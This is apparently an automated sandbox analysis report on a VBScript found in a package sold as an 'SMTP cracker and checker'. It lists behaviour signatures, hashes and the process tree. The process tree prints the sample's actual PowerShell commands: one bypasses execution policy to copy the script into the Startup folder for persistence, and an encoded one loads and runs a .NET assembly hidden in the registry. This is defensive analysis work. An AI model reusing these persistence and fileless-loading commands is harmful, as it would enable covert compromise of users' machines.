Analysis
-
max time kernel
66s -
max time network
83s -
platform
windows10-1703_x64 -
resource
win10-20230220-en -
resource tags
arch:x64arch:x86image:win10-20230220-enlocale:en-usos:windows10-1703-x64system -
submitted
17-03-2023 16:40
Behavioral task
behavioral1
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/1-FR4UDS-SMTP-CRACKER.exe
Resource
win10-20230220-en
Behavioral task
behavioral2
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/2-FR4UDS-SMTP-CHECKER.exe
Resource
win10-20230220-en
Behavioral task
behavioral3
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/__pycache__/FR4UDS.cpython-39.pyc
Resource
win10-20230220-en
Behavioral task
behavioral4
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/installation.bat
Resource
win10-20230220-en
Behavioral task
behavioral5
Sample
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/various/smtp.vbs
Resource
win10-20230220-en
General
-
Target
FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER/various/smtp.vbs
-
Size
62KB
-
MD5
ad077b50e620fc0b715f423aef6a51ae
-
SHA1
05a7a3ab1788598673679b94c7ade8c7bb4d05ae
-
SHA256
b4f286bc808ca2099328f599d503550f8cfd283162a55e6f106664baf5bc6f06
-
SHA512
a0c17fbdd58949886673d1f5ca31ad049c4ec5911610f039176fa349aba317f12e073f24a478aff811bdc1772e9ce4b198a96eb935760a5a357654dd5754e24d
-
SSDEEP
1536:oyt+ecUFsGGHKr8UOpk4tatxwf86qYGYNm:oy8lUiY1lCGom
Malware Config
Signatures
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 6 IoCs
Processes:
powershell.exepowershell.exepid process 4580 powershell.exe 4376 powershell.exe 4376 powershell.exe 4580 powershell.exe 4376 powershell.exe 4580 powershell.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exepowershell.exedescription pid process Token: SeDebugPrivilege 4580 powershell.exe Token: SeDebugPrivilege 4376 powershell.exe -
Suspicious use of WriteProcessMemory 4 IoCs
Processes:
WScript.exedescription pid process target process PID 4344 wrote to memory of 4580 4344 WScript.exe powershell.exe PID 4344 wrote to memory of 4580 4344 WScript.exe powershell.exe PID 4344 wrote to memory of 4376 4344 WScript.exe powershell.exe PID 4344 wrote to memory of 4376 4344 WScript.exe powershell.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO Copy-Item 'C:\Users\Admin\AppData\Local\Temp\FR4UDS SMTP CRACKER & CHECKER WITH PROXY SCRAPER\various\smtp.vbs' 'C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\IPCONFIG.VBS';2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -nOpROFILE -eXECUTIONpOLICY BYPASS -window 1 -NOLOGO -enc IAAkAHQAZQB4AHQAIAA9ACAAKAAoAEcAZQB0AC0ASQB0AGUAbQBQAHIAbwBwAGUAcgB0AHkAIABIAEsAQwBVADoAXABTAG8AZgB0AHcAYQByAGUAXABOAFkAQQBOAHgAQwBBAFQAXAApAC4ATgBZAEEATgB4AEMAQQBUACkAOwAgACQAdABlAHgAdAAgAD0AIAAtAGoAbwBpAG4AIAAkAHQAZQB4AHQAWwAtADEALgAuAC0AJAB0AGUAeAB0AC4ATABlAG4AZwB0AGgAXQA7ACAAWwBBAHAAcABEAG8AbQBhAGkAbgBdADoAOgBDAHUAcgByAGUAbgB0AEQAbwBtAGEAaQBuAC4ATABvAGEAZAAoAFsAQwBvAG4AdgBlAHIAdABdADoAOgBGAHIAbwBtAEIAYQBzAGUANgA0AFMAdAByAGkAbgBnACgAJAB0AGUAeAB0ACkAKQAuAEUAbgB0AHIAeQBQAG8AaQBuAHQALgBJAG4AdgBvAGsAZQAoACQATgB1AGwAbAAsACQATgB1AGwAbAApADsA2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.logFilesize
3KB
MD5f6c90ab0db80c6c3ea92556fda7273c7
SHA101d3866b1887cbb0abe9701f6b49c5dbc66a7dfa
SHA256a823c3b6f157c50315251d43db740ad37a736b967f0500e024e3a0f84192b269
SHA512aa6b71e3a8fa46702787d190e3633b1ead0f66cce81065fa2262dde59c683a7fc48846fa2b0bbe94a050564855fc7a79842f0abfa53cc3315e4c766b3c4c1fbe
-
C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveFilesize
64B
MD5dec0f16acbaf53509efe1a49b14a85d1
SHA1e9d72e4240f93cb51dbaf66cb2995e33d8f41b5b
SHA256c7d07d3e40a966a808eb6ab4fcf90d87051798d4172c02c21a5a9695fd4bafc8
SHA51271eda9a5522cfa2b658cb2bd5e6ea2625bffae1dda4ded6e2df047155f956565e111f55a9fb98c3a89c73605eaf4ae3269398c33243272a1c6a42a24db618e17
-
C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_rv2eyrmp.wvx.ps1Filesize
1B
MD5c4ca4238a0b923820dcc509a6f75849b
SHA1356a192b7913b04c54574d18c28d46e6395428ab
SHA2566b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b
SHA5124dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a
-
memory/4376-131-0x000001C9F88C0000-0x000001C9F8936000-memory.dmpFilesize
472KB
-
memory/4376-167-0x000001C9F88B0000-0x000001C9F88C0000-memory.dmpFilesize
64KB
-
memory/4376-168-0x000001C9F88B0000-0x000001C9F88C0000-memory.dmpFilesize
64KB
-
memory/4580-127-0x000002AE92EB0000-0x000002AE92ED2000-memory.dmpFilesize
136KB
-
memory/4580-165-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmpFilesize
64KB
-
memory/4580-166-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmpFilesize
64KB
-
memory/4580-169-0x000002AE92EA0000-0x000002AE92EB0000-memory.dmpFilesize
64KB